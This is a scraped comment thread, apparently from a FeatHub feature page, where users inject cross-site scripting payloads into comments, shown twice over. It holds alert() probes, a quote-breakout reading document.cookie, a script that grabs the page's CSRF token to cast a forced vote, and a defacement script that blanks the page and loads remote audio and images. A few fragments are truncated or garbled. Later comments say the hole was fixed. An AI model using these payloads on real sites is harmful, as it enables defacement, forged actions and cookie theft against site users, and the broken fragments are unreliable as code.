bbbbx commented about 2 years ago
YOUR SITE EXISTS XSS! please fix it! alert('YOUR SITE EXISTS XSS! please fix it!')
alert('YOUR SITE EXISTS XSS! please fix it!'
alert('YOUR SITE EXISTS XSS! please fix it!')
reinit commented about 2 years ago
var xmlReq = new XMLHttpRequest(); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("method=patch&authenticitytoken=" + document.head.querySelector("[name~=csrf-token][content]").content);
| xss67612 commented about 2 years ago
document.body.innerText = '';
let audio = new Audio('http://dl.stream.qqmusic.qq.com/M5000036Tf0f03sL4n.mp3?vkey=A3EDA94F203BA3612F658DE4820E8AE6D58BA52F8D9F5789E40AFA1065D58F26E0A951C9BB8F482819C3185BE1AEB77356B11F154A90C52D&guid=5150825362&fromtag=1'); audio.loop = true; audio.autoplay = true; document.body.style.height = '1000px'; document.body.addEventListener("mousemove", function () { audio.play(); }); let image = new Image(); image.style.position='absolute'; image.left=0; image.top=0; image.style.width='100%'; image.style.height='100%'; image.src='https://timgsa.baidu.com/timg?image&quality=80&size=b9999_10000&sec=1553929917129&di=a8bae55a6a121071613d4f801322bd0f&imgtype=0&src=http%3A%2F%2Fs6.sinaimg.cn%2Fmw690%2F003xpBcszy6PCoJubOd35%26amp%3B690'; document.body.append(audio,image); console.log('希望你能换个心情,迎接未来美好的每一天!');
LinXueyuanStdio commented about 2 years ago
img,svg,table{visibility: collapse;}
zzxcvbnm19 commented about 2 years ago
alert("111")
"'>alert('XSS')
'>alert(2)
='>alert(document.cookie)
alert(3)
撒旦撒旦alert("111")
window.alert = function() { return false; }
(function() { console.log(3); })();
]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)">
Vortetty commented over 1 year ago
it is fixed then?
yeah, very easily too. they just wrapped all text in ""
this needs closed
zMingGit commented over 1 year ago
lol
Join the discussion!
bbbbx commented about 2 years ago
YOUR SITE EXISTS XSS! please fix it! alert('YOUR SITE EXISTS XSS! please fix it!')
bbbbx commented about 2 years ago
alert('YOUR SITE EXISTS XSS! please fix it!'
bbbbx commented about 2 years ago
alert('YOUR SITE EXISTS XSS! please fix it!')
bbbbx commented about 2 years ago
alert('YOUR SITE EXISTS XSS! please fix it!')
reinit commented about 2 years ago
var xmlReq = new XMLHttpRequest(); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("method=patch&authenticitytoken=" + document.head.querySelector("[name~=csrf-token][content]").content);
| xss67612 commented about 2 years ago
document.body.innerText = '';
LinXueyuanStdio commented about 2 years ago
img,svg,table{visibility: collapse;}
zzxcvbnm19 commented about 2 years ago
alert("111")
zzxcvbnm19 commented about 2 years ago
alert("111")
zzxcvbnm19 commented about 2 years ago
zzxcvbnm19 commented about 2 years ago
'>alert(2)
='>alert(document.cookie)
alert(3)
zzxcvbnm19 commented about 2 years ago
撒旦撒旦alert("111")
zzxcvbnm19 commented about 2 years ago
window.alert = function() { return false; }
zzxcvbnm19 commented about 2 years ago
(function() { console.log(3); })();
zzxcvbnm19 commented about 2 years ago
zzxcvbnm19 commented about 2 years ago
zzxcvbnm19 commented about 2 years ago
zzxcvbnm19 commented about 2 years ago
]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)">
Vortetty commented over 1 year ago
it is fixed then?
Vortetty commented over 1 year ago
yeah, very easily too. they just wrapped all text in ""
Vortetty commented over 1 year ago
this needs closed
zMingGit commented over 1 year ago
lol